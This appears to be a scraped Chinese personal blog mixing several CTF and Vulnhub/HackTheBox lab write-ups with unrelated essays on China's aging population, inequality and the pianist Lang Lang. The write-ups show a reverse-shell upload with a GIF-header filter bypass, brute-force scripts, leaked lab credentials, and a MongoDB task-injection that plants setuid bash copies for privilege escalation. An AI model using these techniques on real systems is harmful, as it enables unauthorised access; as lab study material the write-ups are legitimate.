download

scan

1
2
3
4

21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
8011/tcp open  unknown

ftp

21/tcp open ftp vsftpd 2.3.5

ssh

OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

• https://www.exploit-db.com/exploits/45001/ OpenSSH < 6.6 SFTP - Command Execution 失败

• https://www.exploit-db.com/exploits/45233/ OpenSSH 2.3 < 7.7 - Username Enumeration 成功 确认frank用户存在，但是爆破失败。笑容逐渐消失~~

  http-80port

  http://192.168.1.132/robots.txt显示这个路径存在，心中一喜，访问看看。 NOTHING here , yet ! MD好贱呐！

http-8011port

visit http://192.168.1.132:8011/ Development Server !

1
2

#nmap -sV -p 8011 192.168.1.132
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

info1

Apache/2.2.22 (Ubuntu) Server http://192.168.1.132/development/ 有一个登陆页面

Trying1

输入用户名123，密码123，发现以123:123的形式base64编码。 于是可以尝试爆破。

1
2
3
4
5
6
7
8
9
10
11
12
13

import base64
user = open("/usr/share/wordlists/rockyou.txt","r")
answer=open("/root/Desktop/302/answer.txt","w+")
while True:
	one = user.readline()
	#password = open("/usr/share/wordlists/rockyou.txt","r") 
	with open("/usr/share/wordlists/password.txt","r") as password:
		for one_password in password.readlines():	
			ans = one_password.strip("\n")+":"+one
			key = base64.b64encode(ans)
			answer.writelines(key+"\n")

user.close()

用burp intruder爆破，无果。

好吧，看看writeup，我承认我菜了==

https://delosec.com/vulnhub-ch4inrulz-writeup/

划重点

当时我扫描到了api这个页面，其中提示了四个页面，说在建设中，我检查了前两个，不存在，我就当作四个都不存在。。。

当时的精力花在80端口破解登陆页面去了。。。 反省，需要另开一篇，复习踩点。

http://192.168.1.132:8011/api/files_api.php

• 尝试get提交文件名

  1 2	YOUR IP IS : 192.168.1.128 WRONG INPUT !!

• 尝试post提交文件名 说明该php没有禁止post方式==

接下来我尝试了好久，找apache日志的地址，结果都是无用功。。

• nikto -h ip 找到了一个备份文件 http://192.168.1.132/index.html.bak

1
2
3
4
5
6

<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>

ORZ，我爆破了那么久的口令，就藏在备份文件里了吗。。。 当我尝试$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0作为口令登陆失败，我意识到这可能是一个路径，而不是口令。

于是我找到了另一个登陆页面http://192.168.1.132/development/$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

em。。？黑人问号

• 新知识点1 Apache密码类型 以前遇到的都是加盐（salt）类型的mdf，md5($pass.$salt)。 这次遇到的这一串$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 貌似是apache特有的加密方式==，长见识了。密码学没怎么学。

总之获得了frank:frank!!!口令，登陆后，看到了上传页面。

上传了一个png，然后找图片上传路径==，找了半天没找到。 看了wp，路径是/development/uploader/FRANKuploads

• 新知识点2 wfuzz的使用

1
2
3
4
5

-c 有颜色的输出
-z 扫描模式，可以字典扫描，数字范围扫描。。。
--hc 隐藏具体的响应代码，例如404,200之类的
FUZZ 是需要爆破替换的地址。
--basic 测试一个需要HTTP Basic Auth保护的内容

example:

1
2
3

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --basic "frank:frank!!!" --hc 404 "http://ip/development/uploader/FRANKFUZZ"

wfuzz -c -z range,1-65535 --hl=2 http://ip:60000/url.php?path=http://localhost:FUZZ

文件上传

1. nc -lnvp 1234
2. 选择/usr/share/webshells/php/php-reverse-shell.php
3. 开burp拦截，因为只允许图片类型 后缀改为gif，文件内容改为GIF98，点go就可以成功上传。
4. 绝对路径进行文件包含。 linux2.6，版本很低嘛，很明显的内核漏洞提权，快讲烂了==

总结

wfuzz、nikto、johntheripper，复习了工具的使用。 明明知道怎么操作，但是就是因为字典或者工具的原因无法成功利用那才是灾难。。。

引子

这是一个不公平的社会，你越做坏事越富有，做好事反被抓。——这句话摘自《phrack》。

万维钢，1999年毕业于中国科技大学，曾经是美国科罗拉多大学物理系研究员，现在是作家。

这个人就是我希望成为的那种人，学者。自从看了他写的《万万没想到：用理工科思维理解世界》、《智识分子：做个复杂的现代人》，我尝试学会自己思考。

众所周知，穷人手里是收不上税的，那么一点钱几乎都用来维生，不问政府要低保，已经是好事。而富人呢，只占人群的百分之一不到，你要想从他们手里收税。税一高，他们分分钟跑到另外一个国家。

那么只能对中产阶级露出狞笑，哈哈哈，你叫破喉咙也不会有人来救你的~ 可怜兮兮的中产捂紧了自己的钱袋子。

作为一个贫穷的95后，即没有房也没有车，也看不到未来有任何生活得轻松的希望。从早上到晚的班，工资一部分交了税、一部分交了房租，留下可怜兮兮的一点。这是一个畸形的社会，从一个畸形走向了另一个畸形。以前是大锅饭制度、干多干少一个样，人人都没有劳动的积极性；现在是官商结合的中特资，劳动者收入不如投机上车的，实业误国，房产兴邦。

我既不想拼命赚钱换首付，推高资产泡沫；也不想作为被抛弃的一代，40年后彻底停发养老金，存款被通胀稀释一钱不值，却只能默默承受。

我总感觉很危险。毒牛奶的企业依旧壮大，死亡的婴儿之父、妻离子散铁、铁窗几年…… 等等等等。所有“聪明人”出卖所有来换取金钱，弱势群体被漠然无视。

我并没有抱怨，因为那并不能解决问题。作为一个抑郁症患者，所做的一切都不是为了生活的更好，因为对生活没有兴趣，只是好奇心驱使。 我只是在思考，未来，到底会怎样？

正文

• 明确一个问题，“钱”这个东西实际上是不存在的，人只是规定它存在。 10个年轻人，1个老人，1000袋大米，人均约91袋。 1个年轻人，10个老人，100袋大米，人均约9袋。 所有物资大部分都是年轻人生产的，年轻人数量减少，物资or服务绝对会减少。而不是像某些乐观的人所说，人工智能会代替人类工作（这值得另开一篇文章）。

生产力随着科技进步，的确在提高，工厂那些地方，可以使用机器人。机器擅长的是简单重复性劳动。但是有着不能替代的部分机器绝对不能完成的。所以不要对人工智能报有太大幻想。

股市——中国的证券交易是不乐观的，经济一路下滑， 股市长期看跌。老人退休后不事生产，收入其实来源于对那些正在工作的年轻人的投资回报。资本富余而人力不足会导致收益率低下。

老龄化是正常现象

其次再明确一个问题，老龄化是正常现象。

从欧洲法国到亚洲日本，发达国家普遍进入了老龄化社会，而那些战乱的地区，人还没有老就死了，所以谈不上什么老龄化。

这是一个奇特的年代，自远古至今人类的数量指数性增长。在“核平”的阴影下，看不到发生大规模战争消耗人口数量的可能。

我不认为人口的数量可以无限增长下去，必定存在一个奇点。 现代社会要求的人的技能越来越高，教育年限增加，而劳动回报率相比资本回报又那么低。

加上女性教育程度越高生育率越低。

所以生育率回不去了，老龄化必将到来。

现有体制并没有做好任何准备迎接老龄化，眼见的是仍然在征收社会抚养费和严格的计划生育制度。

日本社会现象

中学时在课本上就学到过日本老龄化，当时十几岁的我当时并没有想到过中国也会跟老龄化扯上关系。

• 日本规定60岁退休，从65岁开始领养老金。 简而言之，从更少年轻人手中收税，供养更多的老年人。 估计以后养老金只够每顿喝粥（夸张的说法），总之杯水车薪。

• 现象二：年轻人压力太大（必须交税供养不事生产的人），选择不生育（生育需要更多的钱）。现代社会，生活的轻松并不需要太多钱，出现佛系青年文化。

• 现象三： 年轻人聚集在大都市，乡村大批房屋空置。

进入老龄化以后，每年的死亡人数>出生人数，进入长达几十年的经济衰退。

生育产业化趋势

据说2050年，中国会达到现在日本的老龄化水平，也就是平均5个人里，就有一个老年人。

日本人口：1亿2659万2千人（2018年1月），2007年2月，人口开始负增长。 根据Jones博士的研究，如果日本人口的出生率不能得到提升，日本的人口总量将会从目前的1.28亿左右下降至2050年的9800万。如果这种预期真的出现，那么日本65岁以上的人口数量占总人口的比例将会从目前的26%左右上升至45%。（https://finance.qq.com/a/20180521/030608.htm）

如果这种制度一直持续下去的话，社会压力到一定程度，改革必定提上议程。

现有人口制度，即一夫一妻制，在历史上似乎并不长久。 原始社会：母系社会，小孩只知其母不知其父。 封建社会：父系社会，有权势的男性有多个配偶，无权势的男性没有配偶。 资本主义社会：名义平权社会，em…名义一夫一妻制。

请问，基因是否有优劣之分？ 生物课都有学过，如果没有优劣之分，那么人为何有有性生殖？

因为有性生殖>无性生殖。有性生殖可以产生基因突变，通过自然选择进行淘汰，最终得以进化。

脑洞大开一下，生育会变为一项产业，家庭抚养会逐渐消解。 实践证明，一夫一妻制抚养生育率是无法挽回的。

要么顺着这条路一直走，民族走向衰败；要么改革迎向新生。 对于个人来说，服从制度，敷衍着一直走是最简单，最符合自己利益的路。 秦朝改革派商鞅，五马分尸。这是前车之鉴。清朝最后一个皇帝，如果说是他统治水平太低下，导致亡国，我想那就太冤了。

就像《人类简史》中说的一样：自从人类某个部落选择农业，然后安定下来，有着充足的粮食来源，农业社会就会人口增长，成为最强大的部落。其他部落要么加入，要么淘汰。农业社会就这样战胜了采集社会，并不以个人意志为转移。

需要积累的行业回报极低

To future people: 2018年，21世纪初，这是一个混乱的世界。 有关注过像图书翻译（千字80元）、出版编辑、架上艺术、电影、芯片、制造业。 某些需要积累的行业，工资低的令人发指。

比方说： 因为重视大腕，不重视编剧，以及广电总菊的原因，新出的电影，演技剧情根本不能跟中国20世纪末相比。 因为图书翻译，按照字数一次性算报酬，而不是质量，一部分书籍质量低劣。 因为宣传“大国工匠”，总是以精神回报而不是物质回报作为报酬，技术工人 的待遇极低。

所有需要积累的行业，由于“实业误国，房产兴邦”的方针，都不在乎什么长期积累了，只要面子好看。

最近玩了一个叫做《画家工会》的游戏。 就是开一家画廊，跟画家们签约，卖画的经营类游戏。

就好像开了一家公司，画家就是我的员工。 一开始玩不好，遇上了有才华的painter，总想给他买2年的旅行套装，杰出大师画布等等。结果他一不小心死了， 就会很难受，心血白费的感觉。 老画家工作了几十年，生病了每次都会给他们看病，最后还要给他们养老送终。

后来学会了将钱花在装备上，建立更大的房子，雇佣更多的员工。 员工有才华固然好，最好雇佣一大堆平均水平的员工。 等他们干不动了，生病了，直接辞退。

这不就是资本主义社会吗？

总之，多学习，多攒钱，开拓眼界，锻炼身体，呆在年轻人比较多的城市，迎接长达几十年的衰退…

这么短的文章实在称不上什么指南，em…等眼界提高了再回来修改吧。

题目

这是一道hackthebox中的web题。 http://docker.hackthebox.eu:47629/main/index.php

源代码

首先分析一下页面，是一个登陆页面。 通过分析源代码，可知： 用户名和密码的表单参数为name1、name2，post提交 myscripts.js 说明获取formaki表单，然后提交。

1
2
3

function doProcess() {
    document.forms["formaki"].submit();
}

源代码中，这里action="./main/index.php表示js提交到这个页面。

http://docker.hackthebox.eu:47629/server-status 403

尝试了源码分析、sql注入检查、口令爆破、搜索jquery的漏洞无果

之后，没有任何思路== 我以为这触及了我的知识盲区，就找了找wp…

源代码中有这个hidden，将输入框隐藏起来，虽然我看到了，但并没有注意。

1
2

 <input type="hidden" value= name="name1"> 
 <input type="hidden" value= name="name2"> 

trying1

wget http://docker.hackthebox.eu:47629/ 将hidden改为text，我们可以看到隐藏的输入框。 暗示了我们name1和name2。 搜索一下，我们就得到了口令。

…怎么说呢，如果我再细心一点，是可以做出来的。

info:TXlMaXR0bGU/cDB3bmll

trying2

再看一眼题目“我们确认有人在用这个网站做阴暗的交易，你能找出这个人是谁，然后向他发送邮件确认吗？”

ok，然后我就检查这个网站的功能。好像在做英语阅读理解==

发送邮件：http://docker.hackthebox.eu:47629/main/Diaxirisths.php 翻了半天，没有任何关于邮箱的线索 我尝试直接提交邮箱，发现直接跳转到还没提交的页面。。。

看到提示secret_area，我连忙下载gif，没有发现任何东西，我就放弃了。完全没想到前面的路径才是提示ORZ…

邮箱地址： http://docker.hackthebox.eu:47756/main/secret_area_/mails.txt 将文字复制出来，然后用awk，得到邮箱。 用intruder即可得到flag.

朗朗是中国数一数二的钢琴演奏家，从他3岁起接触钢琴，就没有一天间断过练习钢琴。 他还未成年就成了举世瞩目的演奏家。

从沈阳到北京，从北京到德国。没有人脉、没有富裕的家庭，他有的只是努力+天赋+运气。 当时中央音乐学院选派5个学生去参加比赛，没有选中朗朗。郎任国就决定自己带朗朗去德国 参加比赛，结果拿了第一名。

为他的努力致敬~

我想说的是艺术这个行业（器乐演奏、架上绘画、舞蹈表演等等），这是一个有着悠久历史的行业，从人类诞生以来，洞窟中的绘画还少么？

所以艺二代（父母从事艺术相关工作）相比普通人，他们的资源唾手可得。钢琴家的子女要是想学演奏，几岁起就可以与国际演奏家朝夕相处。

你只是看到了朗朗成功了，但是没有看到无数和朗朗一样的家庭，投入甚剧，到头来也只能教育和他一样的小孩子学习弹琴。

艺术，和任何拥有着悠久历史的其他行业一样，往往是巨头垄断性的。人们只知道世界上最高的山峰是喜马拉雅山，但不在乎第二、第三、第四。普通家庭往往要满足马斯洛需求的温饱阶段。选择从事巨头垄断行业混饭吃无疑是自找麻烦。

要想活的轻松，生的好是最轻松的。

最好是福利税收双高的发达国家、其次是和平年代的发展中国家、最差是印度之类阶级固化的国家；然后生在富裕的家庭。

就像巴菲特所说：

我的财富来源于多项因素的巧合：生活在美国，某些幸运的基因，以及福利。我和我的孩子们都曾中过我所谓的“卵巢彩票”。(首先，20世纪30年代我出生在美国的几率最多为30:1。我是男性白种人，这也为我剔除了多半美国人不得不面对的障碍。) 我的到的另一个重大运气是生活在市场经济体制下，它总体而言惠泽美国人民，但有时会造成扭曲后果。我工作于这样的一个经济环境：国家以奖章奖励在战地拯救战友生命的人，学生父母以酬金感谢伟大的教师，并且以数以亿计美元奖励发现证券市场定价失真的人。简言之，命运对于好运的分配实在不可捉摸。

这毕竟是一个资本主义社会。

其次，就是选择一个朝阳行业，而不是夕阳行业。 最后再谈努力。

我所拥有的一切都是侥幸，如果侥幸有些成就，也不过是时代的馈赠。不敢奢求太多。

靶机下载地址

扫描

感觉有两种特别难突破防线，一种可以搜集的信息特别特别少，端口只开了一两个；一种信息特别特别多，不知道从哪里下手==

这种貌似就是特别少的那种。 端口：80（http）、27025（unknown）

http服务

访问80端口，自动跳转/Janus.php，只有一行字，你不是admin。。 除此之外没有任何可用页面（网站地图爬行过）

unknown服务

先扫描这个端口，发现nmap扫不出什么服务，nc和浏览器得到一样的response，拒接连接。 应该是我没有用正确的方式连接造成的。

info1

把cookie从0改为1，得到的信息：

1
2
3
4
5
6
7

<html>

  <title>Janus</title>

  <body>Welcome Back Admin Last edited file was: /LELv3FfpLrbX1S4Q2FHA1hRtIoQa38xF8dzc8O9z/home.html Flag: 1{7daLI]} ggez</body>

</html>

web分析

访问下这个页面，这么长url，难怪扫不出来.. http://192.168.1.131/LELv3FfpLrbX1S4Q2FHA1hRtIoQa38xF8dzc8O9z/home.html

源码注释：

1
2
3
4
5
6

<!-- Loki here: once you guys get past isolation come to chat.php and we can try and regain control -->

 <!--
    <video  width=100% height=auto autoplay loop>
    <source src="/LELv3FfpLrbX1S4Q2FHA1hRtIoQa38xF8dzc8O9z/resources/Harpocrates.mp4">
    -->

于是访问下resources这个目录，找了一圈没啥有用的。

dirb http://192.168.1.131/LELv3FfpLrbX1S4Q2FHA1hRtIoQa38xF8dzc8O9z/

info2

icons一般是图标之类的资源文件，没必要去看。

1
2
3
4

User-agent: *
Disallow: /
Disallow: /icons/loki.bin
Disallow: /eris.php

/eris.php

初步判断是命令执行，在如图所示的exec command中可以反弹shell，但是需要用户名和密码，如果错误就会提示ACCESS_DENIED

1
2
3
4

<form action="eris.php" method="post">
Name: <input type="text" name="username"> <br>
Password: <input type="text" name="pass"> <br>
Exec Command: <input type="text" name="command"> <br>

当然也有可能是sql注入，尝试下特殊字符–;#’”

1

[Debain][SQL Server]Syntax error converting the varchar value '--' to a column of data type int. /eris/bypasser.asp, line 113

尝试sqlmap

将burp的requests文件保存为rotate.txt sqlmap -r /root/Desktop/rotate.txt –dbs 失败。 sqlmap -u “http://192.168.1.131/LELv3FfpLrbX1S4Q2FHA1hRtIoQa38xF8dzc8O9z/eris.php” –data=”username=” 放弃

文件下载

返回/icons/loki.bin，点击后下载了loki.bin

1
2

file loki.bin
loki.bin: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5ee04fe5ea96173af27612ff707628d8e684db16, not stripped

vi loki.bin 看到了连接拒接、连接感谢，于是联想到一开始那个unknown的端口

于是运行下

1
2
3
4

./loki.bin
Enter Password: rxmg7n83qv98by（瞎猜的密码）

access_denied 

二进制分析

通过一样的access_denied，说不定是让我们分析这个bin文件，获得口令后，就可以执行命令。 web狗拿起键盘就是干！ ida分析，elf格式64位的程序，可以看到分支跳转密码。

首先，分析下，密码是不是明文写在程序中的。 看来不是。

静态分析了一下，但是ollydbg是windows平台的，不能运行linux可执行程序，这下就犯愁了。 kali搜索一下db (debugger)，还真找到了edb，没用过。。

EDB

A Linux equivalent of the famous Olly debugger on the Windows platform. 貌似和ollydbg差不多，先找到输入密码后的跳转地址。 jnz结果不为零（或不相等）则转移。 jz=jump if zero，一般与cmp连用，用以判断两数是否相等。 在这里，绿色的是条件符合继续执行（不跳转），红色是不符（跳转）。 现在问题是，我们不知道需要输入什么密码，才能跳转到access_granted。

strings字符串分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92

#strings loki.bin
/lib64/ld-linux-x86-64.so.2
libc.so.6
gets
puts
putchar
printf
__cxa_finalize
strcmp
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
=q# 
5j# 
=!# 
=n" 
=p! 
=r  
AWAVI
AUATL
[]A\A]A^A_
access_denied 
access_granted! 
Enter Password: 
;*3$"
backd00r_pass123
GCC: (Debian 7.3.0-21) 7.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7090
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
buffer.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
tmp2
_edata
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
strcmp@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
access_granted
gets@@GLIBC_2.2.5
__libc_csu_init
__bss_start
main
access_denied
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

buffer.c，strcmp 猜测，是让我们用缓冲区溢出的方法得到密码。 这个程序应该是用c语言写的，strcmp是复制函数，典型的用不好就会导致溢出。

输入超长密码，显示段错误。

IDA Pro

F5反编译（ida专业版才有这个功能。。）

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char *v3; // rdi
  char s1; // [rsp+0h] [rbp-200h]
  int i; // [rsp+1FCh] [rbp-4h]

  for ( i = 0; i <= 18; ++i )
  {
    envp = (const char **)i;
    tmp[i] = *((_DWORD *)&g + i);
  }
  printf("Enter Password: ", argv, envp);
  gets(&s1);
  putchar(10);
  if ( !strcmp(&s1, tmp) )
    return access_granted(&s1, tmp);
  v3 = &s1;
  if ( !strcmp(&s1, tmp2) )
  {
    for ( i = 0; i <= 74; ++i )
      tmp[i] = *((_DWORD *)&s + i);
    printf(tmp, tmp2);
    v3 = byte_9 + 1;
    putchar(10);
  }
  return access_denied(v3, tmp2);
}

• strcmp(&s1, tmp) 如果一致，就成功了。比较s1 and tmp，s1是输入的字符串
• tmp[i] = *((_DWORD *)&g + i); tmp是从g取出18位

双击g这个数组，因为tmp从这里取值，18位。目的是定位，然后查看对应的hex view面板，十六进制

wp贴这儿了，最近失恋了，所以不学了。再说吧，都行，hh…

某个CTF的python编程题：

nc 202.38.95.47 12009 连接后提示

1
2

You have only 30 seconds
(((8-2)|(6&135))^((24*31)*(8+3)))

有个坑，从52题起，里面夹杂着命令。 我不知道命令怎么计算，还以为是数据清洗，删除就好。 感谢朋友帮助，根据以前的答案推算出命令和数字的对应关系，然后替换就好。

re注意要点

以下字符使用时需要反斜杠转义。

1
2
3
4

\!
\(
\)
\?

源代码：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169

#coding:utf-8

import socket

import re



target_host = "202.38.95.47"

target_port = 12009



client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)



client.connect((target_host,target_port))

def pattern(Pattern,mystring): #delete pattern, out >>clean string

	strip_list = {"exit":"exit\(\)", \

	"find":"__import__\('os'\)\.system\('find ~'\)", \

	"print":"print\('\x1b\x5b\x33\x3b\x4a\x1b\x5b\x48\x1b\x5b\x32\x4a'\)", \

	"time":"__import__\('time'\)\.sleep\(100\)"}

	myre = strip_list[Pattern] #把正则表达式作为字典的值

	if Pattern == "find":

		middle = re.sub(myre,"2",mystring)

	elif Pattern == "print":

		middle = re.sub(myre,"12",mystring)

	elif Pattern == "time":

		middle = re.sub(myre,"0",mystring)

	elif Pattern == "exit":

		middle = re.sub(myre,"0",mystring)

	return middle

def send_it(result):

	result = eval(result.strip("\n"))

	print ("result "+": "+str(result))

	print ("------------------")

	client.send(bytes((str(result)+"\n"),encoding = 'utf-8'))

def decide(response):

	exist = [] # what pattern need to delete

	find_exist=["exit","find","print","time"]

	for i in find_exist:

		if i in response:

			exist.append(i)

			exist = list(set(exist))			

	print (exist)

	len_exist = len(exist) # decide how many times need to delete



	if len_exist == 1:

		it_result=pattern(exist[0],response)	

		print ("it_result:")

		print (it_result)

		send_it(it_result)

	elif len_exist == 2:

		one_result=pattern(exist[0],response)

		two_result=pattern(exist[1],one_result)

		print ("two_result")

		print (two_result)

		send_it(two_result)

	else:

		one_result=pattern(exist[0],response)

		two_result=pattern(exist[1],one_result)

		three_result=pattern(exist[2],two_result)

		print (three_result)

		send_it(three_result)



n=0

while 1:

	response = client.recv(40000)

	if str(response,encoding = 'utf-8') == "Timeout!\n":

		print ("quiting...")

		break

	elif str(response,encoding = 'utf-8') == "Your answer is wrong!\n":

		print (str(response,encoding = 'utf-8'))		

		break

	else:	

		n+=1

		print ("title"+str(n)+"\n"+str(response,encoding = 'utf-8'))

		if not str(response,encoding = 'utf-8').startswith("You"):

			if n >= 52:

				find_exist=["exit","find","print","time"]

				a=[i for i in find_exist if i in str(response,encoding = 'utf-8')]

				if a== []:

					send_it(str(response,encoding = 'utf-8'))

				else:

					decide(str(response,encoding = 'utf-8'))

					continue

			else:

				result = eval(str(response,encoding = 'utf-8').strip("\n"))

				print ("result "+str(n)+": "+str(result))

				print ("------------------")

				client.send(bytes((str(result)+"\n"),encoding  = 'utf-8'))

靶机下载地址

学习资料

https://rastating.github.io/hackthebox-node-walkthrough/

扫描

1
2

22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
3000/tcp open  http    Node.js Express framework

web

找到了用户名密码，还蛮顺利的==

1
2
3
4

info1:myP14ceAdm1nAcc0uNT/manchester
tom/spongebob
mark/snowflake
rastating/解密失败

通过admin登陆

面板上，可以下载一个backup文件。 打开一看，base64解码一下。 解码后，发现很多乱码，然后夹杂着路径。因为有明文路径，说明base64解码是成功的。

备份文件分析

写个脚本，提取出路径，并分析。路径共有1726行

分析的时候发现不对，然后再把路径去重一下。路径变为863行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

import re
#搜索路径
with open("new.txt","r") as f:
	handle = f.read()
	myre = 'var[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]' #1726 found
	result = re.findall(myre,handle)
#去重复
unique_path = []
for i in result:
	if i not in unique_path:
		unique_path.append(i)
	
print len(unique_path)
#保存路径
with open('foundend.txt','a') as f1:
	for i in unique_path:	
		f1.write(i+'\r\n')	

提取数据库文件

curl -o a.html http://192.168.1.129:3000/node_modules/mongodb-core/conf.json 貌似要登陆

curl -o a.html -u myP14ceAdm1nAcc0uNT:manchester http://192.168.1.129:3000/node_modules/mongodb-core/conf.json

任何请求都会跳转到主页面，尝试禁用js，无效；带admin的cookie，无效；应该是服务器设置了参数。

误区

本来想要提取提取用户名密码，从数据库里，然后ssh登陆的。 但是一直跳转回主页面，纠结了有半小时多吧。

然后突然想起来，前面访问http://192.168.1.129:3000/api/users 是顺利的，并没有跳转到主页。所以。。。

发现是从var/www/myplace/static/从static作为网站根目录，而不是var/www目录，ORZ …

所以，例如目录：var/www/myplace/static/uploads/mark.jpg 应该访问：http://192.168.1.129:3000/uploads/mark.jpg

如果访问错误的链接，会跳转到主页。

没线索了

看看wp

1
2
3

#cat myplace.backup | base64 -d > unknow
#file unknow
unknow: Zip archive data, at least v1.0 to extract

base64加密之后，要用zip再解压一下。。。 我竟然用python提取出路径！！！虽然最近是在学编程，但这里真的不是在考编程啊！！！woc

zip有密码保护，破解zip密码详细请看另一篇 总之，破解密码之后，解压zip得到了源代码。························································

info2：SSH服务 mark:5AYRft73VtFpc84k

准备提权

通过源码泄露的口令，ssh登陆 ssh mark@192.168.1.129

文件上传

将shell脚本传到目标机，检查下有无可利用的信息。 linEnum.sh提权脚本

在生成的扫描报告中，发现本地开放27017端口。稍微搜索一下，就知道是mongodb服务。

在进程里发现tom用户运行了一个app.js，于是我们查看一下

代码分析

/var/scheduler/app.js 在这个js文件中，有一行

1

const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

我们知道了，mongo数据库：

• 用户名：mark
• 密码：5AYRft73VtFpc84k
• 数据库端口：27017
• 数据库名：scheduler

通过数据库命令执行

mongo -p -u mark scheduler 输入info2的口令5AYRft73VtFpc84k。

• 以下命令，使得mark（普通用户）得到了tom（特权用户）的shell。

  1	db.tasks.insert( { "cmd": "/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } );

  

• 运行tombash，就得到了tom的shell

  1	db.tasks.insert( { cmd: "/bin/chown tom:admin /tmp/tombash; chmod g+s /tmp/tombash;" } );

• exit 退出数据库 稍等一会儿，插入js文件被执行，tom这用户，被添加了admin组。

解释

mongo -p -u mark scheduler 以用户名mark连接scheduler数据库 db.tasks.insert(xx) 将数据xx插入到scheduler这个数据库的tasks集合中。 在图片中，可以看到exec(doc.cmd); 于是我们插入的命令，就会被这个js脚本所执行。于是mark这个用户就加入了最高权限组admin。

root.txt

关于root的flag在这个文件/usr/local/bin/backup中，用file命令查看一下。 backup: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped 貌似是一个可执行文件，执行一下，没有任何反应。 用vi命令查看一下

info3

得到了编码的信息。和之前一样，base64解码再zip解压。

1
2
3
4
5

^@Validated access token^@^@Ah-ah-ah! You didn't say the magic word!

^@..^@^@^@Finished! Encoded backup is below:

UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTr